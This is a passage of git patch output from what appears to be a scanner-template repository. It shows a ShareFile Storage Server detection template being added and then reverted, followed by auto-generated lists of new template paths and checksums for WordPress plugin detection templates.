@@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 4e97d52063724ede655b317501b3cf34b25b45a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jul 2023 13:07:48 +0530 Subject: [PATCH 598/609] Create sharefile-storage-server.yaml --- .../sharefile-storage-server.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/technologies/sharefile-storage-server.yaml diff --git a/http/technologies/sharefile-storage-server.yaml b/http/technologies/sharefile-storage-server.yaml new file mode 100644 index 0000000000..ba1e0f04a0 --- /dev/null +++ b/http/technologies/sharefile-storage-server.yaml @@ -0,0 +1,29 @@ +id: sharefile-storage-server + +info: + name: ShareFile Storage Server - Detect + author: DhiyaneshDK + severity: info + metadata: + max-request: 1 + verified: true + shodan-query: title:"ShareFile Storage Server" + tags: tech,citrix,sharefile + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ShareFile Storage Server' + + - type: status + status: + - 200 From b9b2d3d06188f32d9827ba1ea7d350ea289898a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jul 2023 07:38:08 +0000 Subject: [PATCH 599/609] Auto Generated New Template Addition List [Tue Jul 11 07:38:08 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 18b22c60fa..23724bf21e 100644 --- a/.new-additions +++ b/.new-additions @@ -7,3 +7,4 @@ http/cves/2023/CVE-2023-33440.yaml http/cves/2023/CVE-2023-3479.yaml http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml http/misconfiguration/dlink-config-dump.yaml +http/technologies/sharefile-storage-server.yaml From a7d4cff36b82f8cb95e8b3ce31e2d7f0c91ca215 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jul 2023 13:08:20 +0530 Subject: [PATCH 600/609] Revert "Create sharefile-storage-server.yaml" This reverts commit 4e97d52063724ede655b317501b3cf34b25b45a5. --- .../sharefile-storage-server.yaml | 29 ------------------- 1 file changed, 29 deletions(-) delete mode 100644 http/technologies/sharefile-storage-server.yaml diff --git a/http/technologies/sharefile-storage-server.yaml b/http/technologies/sharefile-storage-server.yaml deleted file mode 100644 index ba1e0f04a0..0000000000 --- a/http/technologies/sharefile-storage-server.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: sharefile-storage-server - -info: - name: ShareFile Storage Server - Detect - author: DhiyaneshDK - severity: info - metadata: - max-request: 1 - verified: true - shodan-query: title:"ShareFile Storage Server" - tags: tech,citrix,sharefile - -http: - - method: GET - path: - - '{{BaseURL}}' - - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'ShareFile Storage Server' - - - type: status - status: - - 200 From da49e118b4ca531d59bf15c50115723be2a38039 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jul 2023 07:38:37 +0000 Subject: [PATCH 601/609] Auto Generated Templates Checksum [Tue Jul 11 07:38:37 UTC 2023] :robot: --- templates-checksum.txt | 415 +++++++++++++++++++++-------------------- 1 file changed, 208 insertions(+), 207 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1c83920fe9..2102b01270 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -224,7 +224,7 @@ helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 helpers/wordpress/plugins/coblocks.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 helpers/wordpress/plugins/code-snippets.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/complianz-gdpr.txt:60e6b29cae222d0ccf5641a7ebe9d778961c2629 +helpers/wordpress/plugins/complianz-gdpr.txt:5087f47c1da6ef46c35e08c9ec1a9e2db4fc24a4 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/contact-form-7.txt:aa016b2fe9e1d5ec44a206b16f237f748a306395 helpers/wordpress/plugins/contact-form-cfdb7.txt:0d092b3544a1eeaa4d69abaaa6d6e4f15660efbe @@ -236,7 +236,7 @@ helpers/wordpress/plugins/custom-css-js.txt:40c77b21aca06ae8ad4f43edd798f21a5571 helpers/wordpress/plugins/custom-fonts.txt:9ff4120c2315a5db674958e00529bc95c08b0e76 helpers/wordpress/plugins/custom-post-type-ui.txt:98f8ee0eb7f9c0946fc02d5aafdb333ea0c45513 helpers/wordpress/plugins/disable-comments.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd -helpers/wordpress/plugins/disable-gutenberg.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd +helpers/wordpress/plugins/disable-gutenberg.txt:bdc1408a91f161dab5a9893d23db3c7095200e1d helpers/wordpress/plugins/duplicate-page.txt:69a192666c004f35303d55baa6cc828eb977144f helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/duplicator.txt:6fd4fddb5287b4b436c24d78bff003d1ac10200d @@ -264,7 +264,7 @@ helpers/wordpress/plugins/ga-google-analytics.txt:361f82e0e4329314b5ec0ac3b14d43 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:b51e37a1939bf22a226cba6aa16aa556b5bdfdf3 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:6b474cdaf13fc941946668ffea3b8a5047fc2c73 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:efa2314fd79dfeb6c6a4f1283847a5e31dbed204 -helpers/wordpress/plugins/google-listings-and-ads.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2 +helpers/wordpress/plugins/google-listings-and-ads.txt:384ab86119f465889c9c38711a754b06e7d8aa98 helpers/wordpress/plugins/google-site-kit.txt:744f0f894a0a521da213db9761fe60af501463a6 helpers/wordpress/plugins/google-sitemap-generator.txt:9a1ae806a7c678b6c9b4895b016033f980c1bf10 helpers/wordpress/plugins/gtranslate.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62 @@ -383,7 +383,7 @@ helpers/wordpress/plugins/wp-file-manager.txt:463810c87a57507ca005dd6a19aab00e20 helpers/wordpress/plugins/wp-google-maps.txt:f593dd38154ae03f8ad23a9a3382622eee3e3bf4 helpers/wordpress/plugins/wp-mail-smtp.txt:95f4583e327a11aaa1ea09292b7411fda3205655 helpers/wordpress/plugins/wp-maintenance-mode.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 -helpers/wordpress/plugins/wp-migrate-db.txt:f8b1cdd780aa1026f0dd192b2c25ed46c6cbe798 +helpers/wordpress/plugins/wp-migrate-db.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd helpers/wordpress/plugins/wp-optimize.txt:c207c37cf0046189cdf316228e3097a30d778d30 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f @@ -393,9 +393,9 @@ helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf helpers/wordpress/plugins/wp-smushit.txt:2ddc3af40d4f8085d3ff3021fcd45eca158663e3 helpers/wordpress/plugins/wp-statistics.txt:782ddb65e05f375b535cdffb2b6cc38632460184 helpers/wordpress/plugins/wp-super-cache.txt:b600bf3dacb5d620338f6412a343d3349ec570bf -helpers/wordpress/plugins/wp-user-avatar.txt:06a4c8fb3498a24c86d06fd73d56763fee83924e +helpers/wordpress/plugins/wp-user-avatar.txt:90e21e6589c03430b25fc4c525c14a0d6aff8619 helpers/wordpress/plugins/wpcf7-recaptcha.txt:e864410c570d87244a122a31198944fa5ab9260e -helpers/wordpress/plugins/wpcf7-redirect.txt:35fd2c7ac7c4486ea481738632d2b2188a5e0917 +helpers/wordpress/plugins/wpcf7-redirect.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f helpers/wordpress/plugins/wpforms-lite.txt:868b573d10d425a212e9438804c270d24af5dd12 helpers/wordpress/plugins/wps-hide-login.txt:fa12796bd5aa83d02e53616812c25306cd1d6917 helpers/wordpress/plugins/wpvivid-backuprestore.txt:83a35ac526394e5168b118d107d874266be82e5e @@ -5373,6 +5373,7 @@ http/technologies/sap/sap-web-dispatcher.yaml:0fcce3bf9975b5997bd94993701c0a1601 http/technologies/sap-spartacus-detect.yaml:7ab38bb24d36e1a4e1a42d9241996b6eca893f1b http/technologies/sceditor-detect.yaml:38e4c7d3e0a1ea5435e10b357f11947d67ac7d5c http/technologies/secui-waf-detect.yaml:d266d1f5dc25e4216f5d86062d49f0a3df303483 +http/technologies/sharefile-storage-server.yaml:b76336153a7bfd3eafcd5c11faa5a959f42b4a7c http/technologies/shiro-detect.yaml:e3544725c98df08ed993a912094e3b8066af694e http/technologies/shopizer-detect.yaml:b8d558eb9bb9f426a04e3eeb7c574342f039f0a1 http/technologies/shopware-detect.yaml:446ef652c04a13ee0ab4abec201e2bb09e2fe48b @@ -5423,214 +5424,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:36c8dafa668cca638bf855cf22db851e04568b22 -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 -http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3aa657b603a122999a7b7f29025758df12a0b6f6 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f 